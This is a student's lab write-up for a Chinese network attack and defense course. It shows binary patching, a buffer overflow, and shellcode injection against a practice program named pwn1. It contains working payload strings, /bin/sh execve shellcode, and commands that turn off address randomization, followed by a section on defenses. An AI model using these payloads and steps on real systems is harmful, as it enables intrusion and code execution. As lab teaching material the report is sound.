2019-2020-2 20175334罗昕锐《网络对抗技术》Exp1 PC平台逆向破解
2019-2020-2 20175334罗昕锐《网络对抗技术》Exp1 PC平台逆向破解
1 逆向及Bof基础实践说明
1.1实践目标
-
本次实践的对象是一个名为pwn1的linux可执行文件
-
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串
-
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode
-
三个实践内容如下:
-
手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数
-
利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数
-
注入一个自己制作的shellcode并运行这段shellcode
-
-
这几种思路,基本代表现实情况中的攻击目标:
-
运行原本不可访问的代码片段
-
强行修改程序执行流
-
以及注入运行任意代码
-
1.2基础知识
-
熟悉Linux基本操作
-
能看懂常用指令,如管道(|),输入、输出重定向(>)等
-
理解Bof的原理
-
能看得懂汇编、机器指令、EIP、指令地址
-
会使用gdb,vi
2 直接修改程序机器指令,改变程序执行流程
-
知识要求:Call指令,EIP寄存器,指令跳转的偏移计算,补码,反汇编指令objdump,十六进制编辑工具
-
学习目标:理解可执行文件与机器指令
-
进阶:掌握ELF文件格式,掌握动态技术
2.1下载目标文件pwn1,使用objdump -d pwn1对pwn1反汇编:
2.2在vim中修改地址,反汇编查看结果
-
call 8048491
是汇编指令,是说这条指令将调用位于地址8048491
处的foo
函数,其对应机器指令为e8 d7ffffff
,e8
即跳转之意,当解释e8
这条指令呢,CPU就会转而执行EIP + d7ffffff
这个位置的指令,d7ffffff
是补码,80484ba+d7ffffff= 80484ba-0x29
正好是8048491
这个值 -
main函数调用foo,对应机器指令为
e8 d7ffffff
,那我们想让它调用getShell
,只要修改d7ffffff
为getShell-80484ba
对应的补码就行;用Windows计算器,直接47d-4ba
就能得到补码c3ffffff
-
由此我们就修改可执行文件,将其中的
call
指令的目标地址由d7ffffff
变为c3ffffff
以实现改变程序执行流程 -
打开我们备份的文件pwn2,显示为乱码,输入
:%!xxd
将显示模式切换为16进制模式 -
查找要修改的内容
e8d7ffffff
,将其修改为c3ffffff
,之后使用:%!xxd -r
转换16进制为原格式后保存并退出 -
以下操作是在vi内
1.按ESC键
2.输入如下,将显示模式切换为16进制模式
:%!xxd
3.查找要修改的内容
/e8d7
4.找到后前后的内容和反汇编的对比下,确认是地方是正确的
5.修改d7为c3
6.转换16进制为原格式
:%!xxd -r
7.存盘退出vi
:wq
- 使用
objdump -d pwn2
对pwn2
反汇编,检查call指令
是否正确调用getShell
- 运行改后的代码,会得到shell提示符
3 通过构造输入参数,造成BOF攻击,改变程序执行流
-
知识要求:堆栈结构,返回地址
-
学习目标:理解攻击缓冲区的结果,掌握返回地址的获取
-
进阶:掌握ELF文件格式,掌握动态技术
3.1 反汇编,了解程序的基本功能
- 首先使用
objdump -d pwn1 | more
进行反汇编,了解程序的基本功能
- 该可执行文件正常运行是调用如下函数foo,这个函数有
Buffer overflow
漏洞,我们的目标是利用此漏洞覆盖返回地址
3.2 确认输入字符串哪几个字符会覆盖到返回地址
- 用
gdb
调试程序,再使用info r
查看寄存器的值,发现输入的1234被覆盖到堆栈上的返回地址,接下来我们就要把字符串中会覆盖EIP
的字符替换成getShell
的地址
3.3 确认用什么值来覆盖返回地址
-于是我们将getShell
的地址0x0804847d
把后面的数值替换,即是输入11111111222222223333333344444444\x7d\x84\x04\x08
3.4 构造输入字符串
-
由于我们没法通过键盘输入
\x7d\x84\x04\x08
这样的16进制值,所以先生成包括这样字符串的一个文件。\x0a
表示回车,如果没有的话,在程序运行时就需要手工按一下回车键 -
于是我们通过输入
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
来生成这样的文件。然后查看input文件的内容是否如预期 -
然后将input的输入,通过管道符“|”,作为pwn1的输入。
4 注入Shellcode并执行
4.1 准备一段Shellcode
-
shellcode就是一段机器指令
-
通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),
-
所以这段机器指令被称为shellcode。
-
在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。
-
-
实践采用老师推荐的shellcode:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\
4.2准备工作
- 在root用户下进行准备工作
execstack -s pwn1 //设置堆栈可执行
execstack -q pwn1 //查询文件的堆栈是否可执行,显示X pwn1则表示可执行
more /proc/sys/kernel/randomize_va_space //查看随机化是否关闭,如显示0则已关闭,否则未关闭
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space
4.3 构造要注入的payload
- Linux下有两种基本构造攻击buf的方法:
-
retaddr+nop+shellcode
-
nop+shellcode+retaddr
-
因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面,简单说缓冲区小就把shellcode放后边,缓冲区大就把shellcode放前边
-
本次实验使用的缓冲区足够放shellcode,所以采用nops+shellcode+retaddr,使用如下命令使输出重定向>将perl生成的字符串存储到文件input_shellcode中
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
-
打开一个终端使用
(cat input_shellcode;cat) | ./pwn1
注入这段攻击bof -
再开另外一个终端,用
gdb
来调试pwn1这个进程,输入ps -ef | grep pwn1
找到pwn1的进程号是1333
- 在
gdb
中使用attach 1333
调试这个进程,使用disassemble foo
查看到ret
的地址
- 设置断点,然后在另外一个终端中按下回车,再在
gdb
输入c
继续运行,使用info r esp
查看栈顶指针所在的位置,并查看改地址存放的数据
0xffffd2cc
存放的数据是01020304
,那么shellcode地址就是0xffffd390
-
修改
input_shellcode
文件对应代码为:
perl -e 'print "A" x 32;print "\x90\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
-
然后使用
(cat input_shellcode;cat) | ./pwn1
将input_shellcode
的输入,通过管道符“|”,作为pwn1
的输入
4.5结合nc模拟远程攻击
- 在一台机器上
- 在两台机器上
5 Bof攻击防御技术
5.1从防止注入的角度
- 在编译时,编译器在每次函数调用前后都加入一定的代码,用来设置和检测堆栈上设置的特定数字,以确认是否有bof攻击发生。
5.2. 注入了也不让运行
- 结合CPU的页面管理机制,通过DEP/NX用来将堆栈内存区设置为不可执行,这样即使是注入的shellcode到堆栈上,也执行不了
5.3. 增加shellcode的构造难度
-
shellcode中需要猜测返回地址的位置,需要猜测shellcode注入后的内存位置。这些都极度依赖一个事实:应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR,地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了
-
/proc/sys/kernel/randomize_va_space
用于控制Linux下 内存地址随机化机制,有以下三种情况-
0表示关闭进程地址空间随机化
-
1表示将mmap的基址,stack和vdso页面随机化
-
2表示在1的基础上增加栈(heap)的随机化
-
5.4 从管理的角度
加强编码质量;注意边界检测;使用最新的安全的库函数
6 实验收获与感想
- 本次实验是网络对抗技术课程的一次实验,是关于PC平台逆向破解,根据老师提供的教程和同学的指导,完成了本次实验;通过本次实验,我学会了直接修改程序机器指令、BOF攻击、Shellcode注入执行,这些都是以前闻所未闻的,希望在之后的学习中也能够带着对本门课程的兴趣进行
下去,拓宽自己的知识面,提高自己的实践能力
7 回答问题:什么是漏洞?漏洞有什么危害?
- 漏洞就是系统的弱点和缺陷,是在软硬件设计时未被考虑到的、有被攻击隐患的缺陷;漏洞的存在会给不法分子入侵计算机的机会,如:缓冲区溢出攻击、SQL注入攻击等,从而导致个人资料的泄露、权限的变更、病毒的传播、恶意勒索等后果